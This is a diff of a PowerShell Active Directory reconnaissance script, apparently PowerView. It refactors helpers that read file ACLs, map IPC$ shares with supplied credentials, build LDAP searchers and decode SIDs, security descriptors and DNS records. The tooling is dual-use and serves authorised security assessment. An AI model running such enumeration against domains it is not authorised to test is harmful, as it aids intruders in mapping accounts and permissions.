-              [uint32]'0x40000000' = 'GenericWrite'
-              [uint32]'0x20000000' = 'GenericExecute'
-              [uint32]'0x10000000' = 'GenericAll'
-              [uint32]'0x02000000' = 'MaximumAllowed'
-              [uint32]'0x01000000' = 'AccessSystemSecurity'
-              [uint32]'0x00100000' = 'Synchronize'
-              [uint32]'0x00080000' = 'WriteOwner'
-              [uint32]'0x00040000' = 'WriteDAC'
-              [uint32]'0x00020000' = 'ReadControl'
-              [uint32]'0x00010000' = 'Delete'
-              [uint32]'0x00000100' = 'WriteAttributes'
-              [uint32]'0x00000080' = 'ReadAttributes'
-              [uint32]'0x00000040' = 'DeleteChild'
-              [uint32]'0x00000020' = 'Execute/Traverse'
-              [uint32]'0x00000010' = 'WriteExtendedAttributes'
-              [uint32]'0x00000008' = 'ReadExtendedAttributes'
-              [uint32]'0x00000004' = 'AppendData/AddSubdirectory'
-              [uint32]'0x00000002' = 'WriteData/AddFile'
-              [uint32]'0x00000001' = 'ReadData/ListDirectory'
+                [uint32]'0x80000000' = 'GenericRead'
+                [uint32]'0x40000000' = 'GenericWrite'
+                [uint32]'0x20000000' = 'GenericExecute'
+                [uint32]'0x10000000' = 'GenericAll'
+                [uint32]'0x02000000' = 'MaximumAllowed'
+                [uint32]'0x01000000' = 'AccessSystemSecurity'
+                [uint32]'0x00100000' = 'Synchronize'
+                [uint32]'0x00080000' = 'WriteOwner'
+                [uint32]'0x00040000' = 'WriteDAC'
+                [uint32]'0x00020000' = 'ReadControl'
+                [uint32]'0x00010000' = 'Delete'
+                [uint32]'0x00000100' = 'WriteAttributes'
+                [uint32]'0x00000080' = 'ReadAttributes'
+                [uint32]'0x00000040' = 'DeleteChild'
+                [uint32]'0x00000020' = 'Execute/Traverse'
+                [uint32]'0x00000010' = 'WriteExtendedAttributes'
+                [uint32]'0x00000008' = 'ReadExtendedAttributes'
+                [uint32]'0x00000004' = 'AppendData/AddSubdirectory'
+                [uint32]'0x00000002' = 'WriteData/AddFile'
+                [uint32]'0x00000001' = 'ReadData/ListDirectory'
             }
 
             $SimplePermissions = @{
-              [uint32]'0x1f01ff' = 'FullControl'
-              [uint32]'0x0301bf' = 'Modify'
-              [uint32]'0x0200a9' = 'ReadAndExecute'
-              [uint32]'0x02019f' = 'ReadAndWrite'
-              [uint32]'0x020089' = 'Read'
-              [uint32]'0x000116' = 'Write'
+                [uint32]'0x1f01ff' = 'FullControl'
+                [uint32]'0x0301bf' = 'Modify'
+                [uint32]'0x0200a9' = 'ReadAndExecute'
+                [uint32]'0x02019f' = 'ReadAndWrite'
+                [uint32]'0x020089' = 'Read'
+                [uint32]'0x000116' = 'Write'
             }
 
             $Permissions = @()
 
             # get simple permission
-            $Permissions += $SimplePermissions.Keys |  % {
+            $Permissions += $SimplePermissions.Keys | ForEach-Object {
                               if (($FSR -band $_) -eq $_) {
                                 $SimplePermissions[$_]
                                 $FSR = $FSR -band (-not $_)
@@ -1475,134 +2659,89 @@ function Get-PathAcl {
                             }
 
             # get remaining extended permissions
-            $Permissions += $AccessMask.Keys |
-                            ? { $FSR -band $_ } |
-                            % { $AccessMask[$_] }
-
-            ($Permissions | ?{$_}) -join ","
+            $Permissions += $AccessMask.Keys | Where-Object { $FSR -band $_ } | ForEach-Object { $AccessMask[$_] }
+            ($Permissions | Where-Object {$_}) -join ','
         }
-    }
-
-    process {
-
-        try {
-            $ACL = Get-Acl -Path $Path
-
-            $ACL.GetAccessRules($true,$true,[System.Security.Principal.SecurityIdentifier]) | ForEach-Object {
 
-                $Names = @()
-                if ($_.IdentityReference -match '^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+') {
-                    $Object = Get-ADObject -SID $_.IdentityReference
-                    $Names = @()
-                    $SIDs = @($Object.objectsid)
+        $ConvertArguments = @{}
+        if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
 
-                    if ($Recurse -and (@('268435456','268435457','536870912','536870913') -contains $Object.samAccountType)) {
-                        $SIDs += Get-NetGroupMember -SID $Object.objectsid | Select-Object -ExpandProperty MemberSid
-                    }
+        $MappedComputers = @{}
+    }
 
-                    $SIDs | ForEach-Object {
-                        $Names += ,@($_, (Convert-SidToName $_))
+    PROCESS {
+        ForEach ($TargetPath in $Path) {
+            try {
+                if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
+                    $HostComputer = (New-Object System.Uri($TargetPath)).Host
+                    if (-not $MappedComputers[$HostComputer]) {
+                        # map IPC$ to this computer if it's not already
+                        Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential
+                        $MappedComputers[$HostComputer] = $True
                     }
                 }
-                else {
-                    $Names += ,@($_.IdentityReference.Value, (Convert-SidToName $_.IdentityReference.Value))
-                }
 
-                ForEach($Name in $Names) {
+                $ACL = Get-Acl -Path $TargetPath
+
+                $ACL.GetAccessRules($True, $True, [System.Security.Principal.SecurityIdentifier]) | ForEach-Object {
+                    $SID = $_.IdentityReference.Value
+                    $Name = ConvertFrom-SID -ObjectSID $SID @ConvertArguments
+
                     $Out = New-Object PSObject
-                    $Out | Add-Member Noteproperty 'Path' $Path
+                    $Out | Add-Member Noteproperty 'Path' $TargetPath
                     $Out | Add-Member Noteproperty 'FileSystemRights' (Convert-FileRight -FSR $_.FileSystemRights.value__)
-                    $Out | Add-Member Noteproperty 'IdentityReference' $Name[1]
-                    $Out | Add-Member Noteproperty 'IdentitySID' $Name[0]
+                    $Out | Add-Member Noteproperty 'IdentityReference' $Name
+                    $Out | Add-Member Noteproperty 'IdentitySID' $SID
                     $Out | Add-Member Noteproperty 'AccessControlType' $_.AccessControlType
+                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.FileACL')
                     $Out
                 }
             }
-        }
-        catch {
-            Write-Warning $_
+            catch {
+                Write-Verbose "[Get-PathAcl] error: $_"
+            }
         }
     }
+
+    END {
+        # remove the IPC$ mappings
+        $MappedComputers.Keys | Remove-RemoteConnection
+    }
 }
 
 
-filter Get-NameField {
+function Convert-LDAPProperty {
 <#
-    .SYNOPSIS
-    
-        Helper that attempts to extract appropriate field names from
-        passed computer objects.
-
-    .PARAMETER Object
-
-        The passed object to extract name fields from.
+.SYNOPSIS
 
-    .PARAMETER DnsHostName
-        
-        A DnsHostName to extract through ValueFromPipelineByPropertyName.
+Helper that converts specific LDAP property result fields and outputs
+a custom psobject.
 
-    .PARAMETER Name
-        
-        A Name to extract through ValueFromPipelineByPropertyName.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .EXAMPLE
-
-        PS C:\> Get-NetComputer -FullData | Get-NameField
-#>
-    [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
-        [Object]
-        $Object,
-
-        [Parameter(ValueFromPipelineByPropertyName = $True)]
-        [String]
-        $DnsHostName,
+.DESCRIPTION
 
-        [Parameter(ValueFromPipelineByPropertyName = $True)]
-        [String]
-        $Name
-    )
+Converts a set of raw LDAP properties results from ADSI/LDAP searches
+into a proper PSObject. Used by several of the Get-Domain* function.
 
-    if($PSBoundParameters['DnsHostName']) {
-        $DnsHostName
-    }
-    elseif($PSBoundParameters['Name']) {
-        $Name
-    }
-    elseif($Object) {
-        if ( [bool]($Object.PSobject.Properties.name -match "dnshostname") ) {
-            # objects from Get-NetComputer
-            $Object.dnshostname
-        }
-        elseif ( [bool]($Object.PSobject.Properties.name -match "name") ) {
-            # objects from Get-NetDomainController
-            $Object.name
-        }
-        else {
-            # strings and catch alls
-            $Object
-        }
-    }
-    else {
-        return $Null
-    }
-}
+.PARAMETER Properties
 
+Properties object to extract out LDAP fields for display.
 
-function Convert-LDAPProperty {
-<#
-    .SYNOPSIS
-    
-        Helper that converts specific LDAP property result fields.
-        Used by several of the Get-Net* function.
+.OUTPUTS
 
-    .PARAMETER Properties
+System.Management.Automation.PSCustomObject
 
-        Properties object to extract out LDAP fields for display.
+A custom PSObject with LDAP hashtable properties translated.
 #>
-    param(
-        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('System.Management.Automation.PSCustomObject')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
         [ValidateNotNullOrEmpty()]
         $Properties
     )
@@ -1610,857 +2749,1673 @@ function Convert-LDAPProperty {
     $ObjectProperties = @{}
 
     $Properties.PropertyNames | ForEach-Object {
-        if (($_ -eq "objectsid") -or ($_ -eq "sidhistory")) {
-            # convert the SID to a string
-            $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0],0)).Value
-        }
-        elseif($_ -eq "objectguid") {
-            # convert the GUID to a string
-            $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
-        }
-        elseif( ($_ -eq "lastlogon") -or ($_ -eq "lastlogontimestamp") -or ($_ -eq "pwdlastset") -or ($_ -eq "lastlogoff") -or ($_ -eq "badPasswordTime") ) {
-            # convert timestamps
-            if ($Properties[$_][0] -is [System.MarshalByRefObject]) {
-                # if we have a System.__ComObject
-                $Temp = $Properties[$_][0]
-                [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
-                [Int32]$Low  = $Temp.GetType().InvokeMember("LowPart",  [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
-                $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))
+        if ($_ -ne 'adspath') {
+            if (($_ -eq 'objectsid') -or ($_ -eq 'sidhistory')) {
+                # convert the SID to a string
+                $ObjectProperties[$_] = (New-Object System.Security.Principal.SecurityIdentifier($Properties[$_][0], 0)).Value
+            }
+            elseif ($_ -eq 'objectguid') {
+                # convert the GUID to a string
+                $ObjectProperties[$_] = (New-Object Guid (,$Properties[$_][0])).Guid
+            }
+            elseif ($_ -eq 'ntsecuritydescriptor') {
+                # $ObjectProperties[$_] = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
+                $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $Properties[$_][0], 0
+                if ($Descriptor.Owner) {
+                    $ObjectProperties['Owner'] = $Descriptor.Owner
+                }
+                if ($Descriptor.Group) {
+                    $ObjectProperties['Group'] = $Descriptor.Group
+                }
+                if ($Descriptor.DiscretionaryAcl) {
+                    $ObjectProperties['DiscretionaryAcl'] = $Descriptor.DiscretionaryAcl
+                }
+                if ($Descriptor.SystemAcl) {
+                    $ObjectProperties['SystemAcl'] = $Descriptor.SystemAcl
+                }
             }
-            else {
-                $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))
+            elseif ( ($_ -eq 'lastlogon') -or ($_ -eq 'lastlogontimestamp') -or ($_ -eq 'pwdlastset') -or ($_ -eq 'lastlogoff') -or ($_ -eq 'badPasswordTime') ) {
+                # convert timestamps
+                if ($Properties[$_][0] -is [System.MarshalByRefObject]) {
+                    # if we have a System.__ComObject
+                    $Temp = $Properties[$_][0]
+                    [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+                    [Int32]$Low  = $Temp.GetType().InvokeMember('LowPart',  [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+                    $ObjectProperties[$_] = ([datetime]::FromFileTime([Int64]("0x{0:x8}{1:x8}" -f $High, $Low)))
+                }
+                else {
+                    # otherwise just a string
+                    $ObjectProperties[$_] = ([datetime]::FromFileTime(($Properties[$_][0])))
+                }
             }
-        }
-        elseif($Properties[$_][0] -is [System.MarshalByRefObject]) {
-            # try to convert misc com objects
-            $Prop = $Properties[$_]
-            try {
-                $Temp = $Prop[$_][0]
-                Write-Verbose $_
-                [Int32]$High = $Temp.GetType().InvokeMember("HighPart", [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
-                [Int32]$Low  = $Temp.GetType().InvokeMember("LowPart",  [System.Reflection.BindingFlags]::GetProperty, $null, $Temp, $null)
-                $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)
+            elseif ($Properties[$_][0] -is [System.MarshalByRefObject]) {
+                # try to convert misc com objects
+                $Prop = $Properties[$_]
+                try {
+                    $Temp = $Prop[$_][0]
+                    [Int32]$High = $Temp.GetType().InvokeMember('HighPart', [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+                    [Int32]$Low  = $Temp.GetType().InvokeMember('LowPart',  [System.Reflection.BindingFlags]::GetProperty, $Null, $Temp, $Null)
+                    $ObjectProperties[$_] = [Int64]("0x{0:x8}{1:x8}" -f $High, $Low)
+                }
+                catch {
+                    Write-Verbose "[Convert-LDAPProperty] error: $_"
+                    $ObjectProperties[$_] = $Prop[$_]
+                }
             }
-            catch {
-                $ObjectProperties[$_] = $Prop[$_]
+            elseif ($Properties[$_].count -eq 1) {
+                $ObjectProperties[$_] = $Properties[$_][0]
+            }
+            else {
+                $ObjectProperties[$_] = $Properties[$_]
             }
-        }
-        elseif($Properties[$_].count -eq 1) {
-            $ObjectProperties[$_] = $Properties[$_][0]
-        }
-        else {
-            $ObjectProperties[$_] = $Properties[$_]
         }
     }
-
-    New-Object -TypeName PSObject -Property $ObjectProperties
+    try {
+        New-Object -TypeName PSObject -Property $ObjectProperties
+    }
+    catch {
+        Write-Warning "[Convert-LDAPProperty] Error parsing LDAP properties : $_"
+    }
 }
 
 
-
 ########################################################
 #
 # Domain info functions below.
 #
 ########################################################
 
-filter Get-DomainSearcher {
+function Get-DomainSearcher {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Helper used by various functions that builds a custom AD searcher object.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-Domain  
+
+.DESCRIPTION
+
+Takes a given domain and a number of customizations and returns a
+System.DirectoryServices.DirectorySearcher object. This function is used
+heavily by other LDAP/ADSI searcher functions (Verb-Domain*).
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER SearchBasePrefix
+
+Specifies a prefix for the LDAP search string (i.e. "CN=Sites,CN=Configuration").
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
 
-        Helper used by various functions that takes an ADSpath and
-        domain specifier and builds the correct ADSI searcher object.
+.PARAMETER ResultPageSize
 
-    .PARAMETER Domain
+Specifies the PageSize to set for the LDAP searcher object.
 
-        The domain to use for the query, defaults to the current domain.
+.PARAMETER ResultPageSize
 
-    .PARAMETER DomainController
+Specifies the PageSize to set for the LDAP searcher object.
 
-        Domain controller to reflect LDAP queries through.
+.PARAMETER ServerTimeLimit
 
-    .PARAMETER ADSpath
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
 
-        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
-        Useful for OU queries.
+.PARAMETER SecurityMasks
 
-    .PARAMETER ADSprefix
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
 
-        Prefix to set for the searcher (like "CN=Sites,CN=Configuration")
+.PARAMETER Tombstone
 
-    .PARAMETER PageSize
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
 
-        The PageSize to set for the LDAP searcher object.
+.PARAMETER Credential
 
-    .PARAMETER Credential
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
 
-        A [Management.Automation.PSCredential] object of alternate credentials
-        for connection to the target domain.
+.EXAMPLE
 
-    .EXAMPLE
+Get-DomainSearcher -Domain testlab.local
 
-        PS C:\> Get-DomainSearcher -Domain testlab.local
+Return a searcher for all objects in testlab.local.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-DomainSearcher -Domain testlab.local -DomainController SECONDARY.dev.testlab.local
+Get-DomainSearcher -Domain testlab.local -LDAPFilter '(samAccountType=805306368)' -Properties 'SamAccountName,lastlogon'
+
+Return a searcher for user objects in testlab.local and only return the SamAccountName and LastLogon properties.
+
+.EXAMPLE
+
+Get-DomainSearcher -SearchBase "LDAP://OU=secret,DC=testlab,DC=local"
+
+Return a searcher that searches through the specific ADS/LDAP search base (i.e. OU).
+
+.OUTPUTS
+
+System.DirectoryServices.DirectorySearcher
 #>
 
-    param(
-        [Parameter(ValueFromPipeline=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('System.DirectoryServices.DirectorySearcher')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(ValueFromPipeline = $True)]
+        [ValidateNotNullOrEmpty()]
         [String]
         $Domain,
 
+        [ValidateNotNullOrEmpty()]
+        [Alias('Filter')]
         [String]
-        $DomainController,
+        $LDAPFilter,
 
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $Properties,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('ADSPath')]
+        [String]
+        $SearchBase,
+
+        [ValidateNotNullOrEmpty()]
+        [String]
+        $SearchBasePrefix,
+
+        [ValidateNotNullOrEmpty()]
+        [Alias('DomainController')]
         [String]
-        $ADSpath,
+        $Server,
 
+        [ValidateSet('Base', 'OneLevel', 'Subtree')]
         [String]
-        $ADSprefix,
+        $SearchScope = 'Subtree',
 
-        [ValidateRange(1,10000)] 
+        [ValidateRange(1, 10000)]
         [Int]
-        $PageSize = 200,
+        $ResultPageSize = 200,
+
+        [ValidateRange(1, 10000)]
+        [Int]
+        $ServerTimeLimit = 120,
+
+        [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+        [String]
+        $SecurityMasks,
+
+        [Switch]
+        $Tombstone,
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    if(-not $Credential) {
-        if(-not $Domain) {
-            $Domain = (Get-NetDomain).name
+    PROCESS {
+        if ($PSBoundParameters['Domain']) {
+            $TargetDomain = $Domain
         }
-        elseif(-not $DomainController) {
+        else {
+            # if not -Domain is specified, retrieve the current domain name
+            if ($PSBoundParameters['Credential']) {
+                $DomainObject = Get-Domain -Credential $Credential
+            }
+            else {
+                $DomainObject = Get-Domain
+            }
+            $TargetDomain = $DomainObject.Name
+        }
+
+        if (-not $PSBoundParameters['Server']) {
+            # if there's not a specified server to bind to, try to pull the current domain PDC
             try {
-                # if there's no -DomainController specified, try to pull the primary DC to reflect queries through
-                $DomainController = ((Get-NetDomain).PdcRoleOwner).Name
+                if ($DomainObject) {
+                    $BindServer = $DomainObject.PdcRoleOwner.Name
+                }
+                elseif ($PSBoundParameters['Credential']) {
+                    $BindServer = ((Get-Domain -Credential $Credential).PdcRoleOwner).Name
+                }
+                else {
+                    $BindServer = ((Get-Domain).PdcRoleOwner).Name
+                }
             }
             catch {
-                throw "Get-DomainSearcher: Error in retrieving PDC for current domain"
+                throw "[Get-DomainSearcher] Error in retrieving PDC for current domain: $_"
             }
         }
-    }
-    elseif (-not $DomainController) {
-        # if a DC isn't specified
-        try {
-            $DomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name
-        }
-        catch {
-            throw "Get-DomainSearcher: Error in retrieving PDC for current domain"
-        }
-
-        if(!$DomainController) {
-            throw "Get-DomainSearcher: Error in retrieving PDC for current domain"
+        else {
+            $BindServer = $Server
         }
-    }
 
-    $SearchString = "LDAP://"
+        $SearchString = 'LDAP://'
 
-    if($DomainController) {
-        $SearchString += $DomainController
-        if($Domain){
-            $SearchString += '/'
+        if ($BindServer -and ($BindServer.Trim() -ne '')) {
+            $SearchString += $BindServer
+            if ($TargetDomain) {
+                $SearchString += '/'
+            }
         }
-    }
-
-    if($ADSprefix) {
-        $SearchString += $ADSprefix + ','
-    }
 
-    if($ADSpath) {
-        if($ADSpath -Match '^GC://') {
-            # if we're searching the global catalog
-            $DN = $AdsPath.ToUpper().Trim('/')
-            $SearchString = ''
+        if ($PSBoundParameters['SearchBasePrefix']) {
+            $SearchString += $SearchBasePrefix + ','
         }
-        else {
-            if($ADSpath -match '^LDAP://') {
-                if($ADSpath -match "LDAP://.+/.+") {
-                    $SearchString = ''
+
+        if ($PSBoundParameters['SearchBase']) {
+            if ($SearchBase -Match '^GC://') {
+                # if we're searching the global catalog, get the path in the right format
+                $DN = $SearchBase.ToUpper().Trim('/')
+                $SearchString = ''
+            }
+            else {
+                if ($SearchBase -match '^LDAP://') {
+                    if ($SearchBase -match "LDAP://.+/.+") {
+                        $SearchString = ''
+                        $DN = $SearchBase
+                    }
+                    else {
+                        $DN = $SearchBase.SubString(7)
+                    }
                 }
                 else {
-                    $ADSpath = $ADSpath.Substring(7)
+                    $DN = $SearchBase
                 }
             }
-            $DN = $ADSpath
         }
-    }
-    else {
-        if($Domain -and ($Domain.Trim() -ne "")) {
-            $DN = "DC=$($Domain.Replace('.', ',DC='))"
+        else {
+            # transform the target domain name into a distinguishedName if an ADS search base is not specified
+            if ($TargetDomain -and ($TargetDomain.Trim() -ne '')) {
+                $DN = "DC=$($TargetDomain.Replace('.', ',DC='))"
+            }
         }
-    }
 
-    $SearchString += $DN
-    Write-Verbose "Get-DomainSearcher search string: $SearchString"
+        $SearchString += $DN
+        Write-Verbose "[Get-DomainSearcher] search string: $SearchString"
 
-    if($Credential) {
-        Write-Verbose "Using alternate credentials for LDAP connection"
-        $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)
-        $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)
-    }
-    else {
-        $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
-    }
+        if ($Credential -ne [Management.Automation.PSCredential]::Empty) {
+            Write-Verbose "[Get-DomainSearcher] Using alternate credentials for LDAP connection"
+            # bind to the inital search object using alternate credentials
+            $DomainObject = New-Object DirectoryServices.DirectoryEntry($SearchString, $Credential.UserName, $Credential.GetNetworkCredential().Password)
+            $Searcher = New-Object System.DirectoryServices.DirectorySearcher($DomainObject)
+        }
+        else {
+            # bind to the inital object using the current credentials
+            $Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
+        }
+
+        $Searcher.PageSize = $ResultPageSize
+        $Searcher.SearchScope = $SearchScope
+        $Searcher.CacheResults = $False
+        $Searcher.ReferralChasing = [System.DirectoryServices.ReferralChasingOption]::All
+
+        if ($PSBoundParameters['ServerTimeLimit']) {
+            $Searcher.ServerTimeLimit = $ServerTimeLimit
+        }
+
+        if ($PSBoundParameters['Tombstone']) {
+            $Searcher.Tombstone = $True
+        }
 
-    $Searcher.PageSize = $PageSize
-    $Searcher.CacheResults = $False
-    $Searcher
+        if ($PSBoundParameters['LDAPFilter']) {
+            $Searcher.filter = $LDAPFilter
+        }
+
+        if ($PSBoundParameters['SecurityMasks']) {
+            $Searcher.SecurityMasks = Switch ($SecurityMasks) {
+                'Dacl' { [System.DirectoryServices.SecurityMasks]::Dacl }
+                'Group' { [System.DirectoryServices.SecurityMasks]::Group }
+                'None' { [System.DirectoryServices.SecurityMasks]::None }
+                'Owner' { [System.DirectoryServices.SecurityMasks]::Owner }
+                'Sacl' { [System.DirectoryServices.SecurityMasks]::Sacl }
+            }
+        }
+
+        if ($PSBoundParameters['Properties']) {
+            # handle an array of properties to load w/ the possibility of comma-separated strings
+            $PropertiesToLoad = $Properties| ForEach-Object { $_.Split(',') }
+            $Null = $Searcher.PropertiesToLoad.AddRange(($PropertiesToLoad))
+        }
+
+        $Searcher
+    }
 }
 
 
-filter Convert-DNSRecord {
+function Convert-DNSRecord {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Helpers that decodes a binary DNS record blob.
+
+Author: Michael B. Smith, Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-       Decodes a binary DNS record.
+.DESCRIPTION
 
-       Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
+Decodes a binary blob representing an Active Directory DNS entry.
+Used by Get-DomainDNSRecord.
 
-    .PARAMETER DNSRecord
+Adapted/ported from Michael B. Smith's code at https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
 
-        The domain to query for zones, defaults to the current domain.
+.PARAMETER DNSRecord
 
-    .LINK
+A byte array representing the DNS record.
 
-        https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
+.OUTPUTS
+
+System.Management.Automation.PSCustomObject
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
+
+.LINK
+
+https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
 #>
-    param(
-        [Parameter(Position=0, ValueFromPipelineByPropertyName=$True, Mandatory=$True)]
+
+    [OutputType('System.Management.Automation.PSCustomObject')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
         [Byte[]]
         $DNSRecord
     )
 
-    function Get-Name {
-        # modified decodeName from https://raw.githubusercontent.com/mmessano/PowerShell/master/dns-dump.ps1
-        [CmdletBinding()]
-        param(
-            [Byte[]]
-            $Raw
-        )
+    BEGIN {
+        function Get-Name {
+            [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseOutputTypeCorrectly', '')]
+            [CmdletBinding()]
+            Param(
+                [Byte[]]
+                $Raw
+            )
 
-        [Int]$Length = $Raw[0]
-        [Int]$Segments = $Raw[1]
-        [Int]$Index =  2
-        [String]$Name  = ""
+            [Int]$Length = $Raw[0]
+            [Int]$Segments = $Raw[1]
+            [Int]$Index =  2
+            [String]$Name  = ''
 
-        while ($Segments-- -gt 0)
-        {
-            [Int]$SegmentLength = $Raw[$Index++]
-            while ($SegmentLength-- -gt 0) {
-                $Name += [Char]$Raw[$Index++]
+            while ($Segments-- -gt 0)
+            {
+                [Int]$SegmentLength = $Raw[$Index++]
+                while ($SegmentLength-- -gt 0) {
+                    $Name += [Char]$Raw[$Index++]
+                }
+                $Name += "."
             }
-            $Name += "."
+            $Name
         }
-        $Name
     }
 
-    $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)
-    $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)
-    $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)
+    PROCESS {
+        # $RDataLen = [BitConverter]::ToUInt16($DNSRecord, 0)
+        $RDataType = [BitConverter]::ToUInt16($DNSRecord, 2)
+        $UpdatedAtSerial = [BitConverter]::ToUInt32($DNSRecord, 8)
 
-    $TTLRaw = $DNSRecord[12..15]
-    # reverse for big endian
-    $Null = [array]::Reverse($TTLRaw)
-    $TTL = [BitConverter]::ToUInt32($TTLRaw, 0)
+        $TTLRaw = $DNSRecord[12..15]
 
-    $Age = [BitConverter]::ToUInt32($DNSRecord, 20)
-    if($Age -ne 0) {
-        $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()
-    }
-    else {
-        $TimeStamp = "[static]"
-    }
+        # reverse for big endian
+        $Null = [array]::Reverse($TTLRaw)
+        $TTL = [BitConverter]::ToUInt32($TTLRaw, 0)
 
-    $DNSRecordObject = New-Object PSObject
+        $Age = [BitConverter]::ToUInt32($DNSRecord, 20)
+        if ($Age -ne 0) {
+            $TimeStamp = ((Get-Date -Year 1601 -Month 1 -Day 1 -Hour 0 -Minute 0 -Second 0).AddHours($age)).ToString()
+        }
+        else {
+            $TimeStamp = '[static]'
+        }
 
-    if($RDataType -eq 1) {
-        $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]
-        $Data = $IP
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'
-    }
+        $DNSRecordObject = New-Object PSObject
 
-    elseif($RDataType -eq 2) {
-        $NSName = Get-Name $DNSRecord[24..$DNSRecord.length]
-        $Data = $NSName
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'
-    }
+        if ($RDataType -eq 1) {
+            $IP = "{0}.{1}.{2}.{3}" -f $DNSRecord[24], $DNSRecord[25], $DNSRecord[26], $DNSRecord[27]
+            $Data = $IP
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'A'
+        }
 
-    elseif($RDataType -eq 5) {
-        $Alias = Get-Name $DNSRecord[24..$DNSRecord.length]
-        $Data = $Alias
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME'
-    }
+        elseif ($RDataType -eq 2) {
+            $NSName = Get-Name $DNSRecord[24..$DNSRecord.length]
+            $Data = $NSName
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'NS'
+        }
 
-    elseif($RDataType -eq 6) {
-        # TODO: how to implement properly? nested object?
-        $Data = $([System.Convert]::ToBase64String($DNSRecord[24..$DNSRecord.length]))
-        $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'SOA'
-    }
+        elseif ($RDataType -eq 5) {
+            $Alias = Get-Name $DNSRecord[24..$DNSRecord.length]
+            $Data = $Alias
+            $DNSRecordObject | Add-Member Noteproperty 'RecordType' 'CNAME'
+        }
 
